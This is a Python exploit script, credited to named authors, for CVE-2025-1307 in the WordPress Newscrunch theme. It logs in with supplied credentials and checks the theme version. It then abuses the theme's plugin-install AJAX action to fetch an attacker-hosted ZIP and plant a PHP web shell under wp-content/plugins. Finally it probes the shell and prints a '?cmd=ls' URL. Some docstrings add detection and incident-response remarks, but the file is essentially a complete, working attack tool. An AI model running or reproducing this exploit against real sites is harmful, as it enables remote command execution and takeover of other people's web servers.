import requests
import urllib3
import argparse
import time
import re
import zipfile
import io
from packaging import version
# Every HTTP call in this script passes verify=False, so server certificates
# are never validated and responses cannot be authenticated. This call only
# silences the InsecureRequestWarning that would otherwise be reported for
# those unverified requests.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Text printed once at start-up by the __main__ block; it has no functional role.
BANNER = """
@@@@@@@ @@@ @@@ @@@@@@@@ @@@@@@ @@@@@@@@ @@@@@@ @@@@@@@ @@@ @@@@@@ @@@@@@@@ @@@@@@@@
@@@@@@@@ @@@ @@@ @@@@@@@@ @@@@@@@@ @@@@@@@@@@ @@@@@@@@ @@@@@@@ @@@@ @@@@@@@ @@@@@@@@@@ @@@@@@@@
!@@ @@! @@@ @@! @@@ @@! @@@@ @@@ !@@ @@@!! @@@ @@! @@@@ @@!
!@! !@! @!@ !@! @!@ !@! @!@!@ @!@ !@! !@! @!@ !@! @!@!@ !@!
!@! @!@ !@! @!!!:! @!@!@!@!@ !!@ @!@ @! !@! !!@ !!@@!! @!@!@!@!@ @!@ @!@!!@ @!@ @! !@! @!!
!!! !@! !!! !!!!!: !!!@!@!!! !!: !@!!! !!! !!: @!!@!!! !!!@!@!!! !@! !!@!@! !@!!! !!! !!!
:!! :!: !!: !!: !:! !!:! !!! !:! !:! !!: !!: !!:! !!! !!:
:!: ::!!:! :!: :!: :!: !:! :!: !:! :!: :!: :!: !:! :!:
::: ::: :::: :: :::: :: ::::: ::::::: :: :: ::::: :::: :: ::: :: :::: ::::::: :: ::
:: :: : : : :: :: :: : ::: : : : : :: : ::: :: : : :: : : : : : : : : :
Exploit by | Nxploit , Khaled_alenazi
"""
def get_filename_from_zip(payload_url):
    """Return the name of the first ``.php`` member of the ZIP at *payload_url*.

    The archive is downloaded by this script itself (not by the target) and
    only its member list is read; nothing is extracted to disk here. The
    returned name is later used by ``exploit`` to build the path that is
    probed under ``wp-content/plugins/``.

    Args:
        payload_url: URL of a ZIP archive.

    Returns:
        The first member name ending in ``.php`` in archive order, or ``None``
        when the archive has no such member or any error occurs.
    """
    try:
        # The HTTP status is not inspected: a non-ZIP body (e.g. an error page)
        # surfaces as a zipfile error and lands in the handler below.
        archive_bytes = requests.get(payload_url, verify=False, timeout=10).content
        with zipfile.ZipFile(io.BytesIO(archive_bytes), 'r') as archive:
            member_names = archive.namelist()
        # First match wins; None when the archive holds no .php member.
        return next((name for name in member_names if name.endswith(".php")), None)
    except Exception as e:
        # Deliberately broad: download, parsing and archive errors are all
        # reported the same way and turned into a None result.
        print(f"[-] Error extracting filename from ZIP: {e}")
        return None
def check_version(url):
    """Decide from the theme's public ``readme.txt`` whether to continue.

    The script reads ``/wp-content/themes/newscrunch/readme.txt`` and compares
    the ``Stable tag:`` value with 1.8.4, the highest version it treats as
    affected. The check is a heuristic: the value comes from a static text
    file, and the function also returns ``True`` when the file cannot be
    fetched or the tag cannot be parsed.

    From a hardening point of view, this shows that a world-readable theme
    ``readme.txt`` discloses the installed version to anyone who asks for it.

    Args:
        url: Base URL of the WordPress site, without a trailing slash.

    Returns:
        ``False`` when the detected version is above 1.8.4 or the request
        raises a ``requests.RequestException``; ``True`` in every other case.
    """
    try:
        readme_url = f"{url}/wp-content/themes/newscrunch/readme.txt"
        response = requests.get(readme_url, verify=False, timeout=10)

        if response.status_code != 200:
            print("[-] Failed to fetch theme version. Proceeding anyway...")
            return True

        stable_tag = re.search(r"Stable tag:\s*([\d.]+)", response.text)
        if not stable_tag:
            print("[-] Could not determine theme version. Proceeding anyway...")
            return True

        theme_version = stable_tag.group(1)
        print(f"[+] Newscrunch theme version detected: {theme_version}")

        # NOTE(review): version.parse may raise on a malformed tag; only
        # requests.RequestException is caught below, so that would propagate.
        is_affected = version.parse(theme_version) <= version.parse("1.8.4")
        if not is_affected:
            print("[-] Target version is not vulnerable. Exiting.")
            return False

        print("[+] Exploitation is possible, proceeding...")
        return True
    except requests.RequestException as e:
        print(f"[-] Error checking version: {e}")
        return False
def login(url, username, password):
    """Authenticate against ``wp-login.php`` and return the logged-in session.

    The later request to ``admin-ajax.php`` is sent through this session, so
    the flow on this page depends on valid WordPress credentials. Success is
    judged only by the presence of a cookie whose name contains
    ``wordpress_logged_in``; the response body and status are not examined.

    Args:
        url: Base URL of the WordPress site, without a trailing slash.
        username: WordPress account name.
        password: WordPress account password.

    Returns:
        The authenticated ``requests.Session``, or ``None`` when no login
        cookie was set or the request raised ``requests.RequestException``.
    """
    try:
        session = requests.Session()
        credentials = {'log': username, 'pwd': password, 'rememberme': 'forever', 'wp-submit': 'Log+In'}
        print("[*] Logging in...")
        session.post(f"{url}/wp-login.php", verify=False, data=credentials, timeout=10)
        time.sleep(2)

        for cookie in session.cookies:
            if 'wordpress_logged_in' in cookie.name:
                print("[+] Logged in successfully.")
                return session

        print("[-] Failed to log in. Check credentials.")
        return None
    except requests.RequestException as e:
        print(f"[-] Error logging in: {e}")
        return None
def upload_and_extract(session, url, payload_url):
    """Send the theme's plugin-install AJAX request with a remote archive URL.

    The request is a POST to ``/wp-admin/admin-ajax.php`` with
    ``action=newscrunch_install_activate_plugin`` in the query string and a
    ``plugin_url`` form field. For detection, that action name combined with
    a ``plugin_url`` value pointing at an unexpected host is the
    distinguishing trait of this request in web-server or WAF logs.

    Args:
        session: Authenticated ``requests.Session`` returned by ``login``.
        url: Base URL of the WordPress site, without a trailing slash.
        payload_url: URL of the ZIP archive passed as ``plugin_url``.

    Returns:
        ``True`` when the response text contains ``success`` (case-insensitive),
        ``False`` otherwise or when the request raises
        ``requests.RequestException``.
    """
    try:
        endpoint = f"{url}/wp-admin/admin-ajax.php?action=newscrunch_install_activate_plugin"
        form_fields = {'plugin_url': payload_url}
        print("[*] Uploading and extracting payload...")
        response = session.post(endpoint, verify=False, data=form_fields, timeout=15)
        time.sleep(3)

        # A plain substring match: any body containing "success" counts, so the
        # result is an indication rather than proof that a file was written.
        if "success" not in response.text.lower():
            print("[-] Exploit failed. Server response:")
            print(response.text)
            return False

        print("[+] Exploit executed successfully. Malicious file uploaded.")
        return True
    except requests.RequestException as e:
        print(f"[-] Error during upload and extraction: {e}")
        return False
def exploit(url, username, password, payload_url):
    """Run the full sequence: version check, archive inspection, login, upload, probe.

    Each stage aborts the run when it fails. After a reported successful
    upload the function requests ``/wp-content/plugins/<first .php member>``
    and treats HTTP 200 as confirmation. For incident response, that path
    shows where to look: PHP files under ``wp-content/plugins/`` that do not
    belong to an installed plugin, created shortly after a request to the
    ``newscrunch_install_activate_plugin`` AJAX action.

    Args:
        url: Base URL of the WordPress site, without a trailing slash.
        username: WordPress account name.
        password: WordPress account password.
        payload_url: URL of the ZIP archive handed to the theme endpoint.

    Returns:
        ``None``; progress and results are printed.
    """
    if not check_version(url):
        return

    shell_file = get_filename_from_zip(payload_url)
    if not shell_file:
        print("[-] Could not determine the shell filename. Exiting.")
        return

    session = login(url, username, password)
    if not session:
        return

    if not upload_and_extract(session, url, payload_url):
        return

    shell_url = f"{url}/wp-content/plugins/{shell_file}"
    print(f"[*] Checking if shell is accessible: {shell_url}")
    time.sleep(2)
    try:
        shell_response = session.get(shell_url, verify=False, timeout=10)
        # Only the status code is checked; a site that answers 200 for missing
        # paths would be reported as a success here.
        if shell_response.status_code != 200:
            print("[-] Shell upload failed or blocked. Check manually.")
        else:
            print(f"[+] Shell successfully uploaded and accessible: {shell_url}?cmd=ls")
    except requests.RequestException as e:
        print(f"[-] Error checking shell accessibility: {e}")
if __name__ == "__main__":
    # Command-line entry point: print the banner, parse the four required
    # options and hand them to exploit().
    print(BANNER)
    cli = argparse.ArgumentParser(description="Exploit for CVE-2025-1307 in WordPress Newscrunch Theme By Nxploit | Khaled Alenazi")
    cli.add_argument('-u', '--url', required=True, help="Target WordPress URL (e.g., https://example.com)")
    cli.add_argument('-un', '--username', required=True, help="WordPress username")
    # The password is taken from argv, so it is visible in the process list
    # and in shell history on the machine running the script.
    cli.add_argument('-p', '--password', required=True, help="WordPress password")
    cli.add_argument('-pl', '--payload_url', required=True, help="Malicious file URL to upload")
    opts = cli.parse_args()
    exploit(opts.url, opts.username, opts.password, opts.payload_url)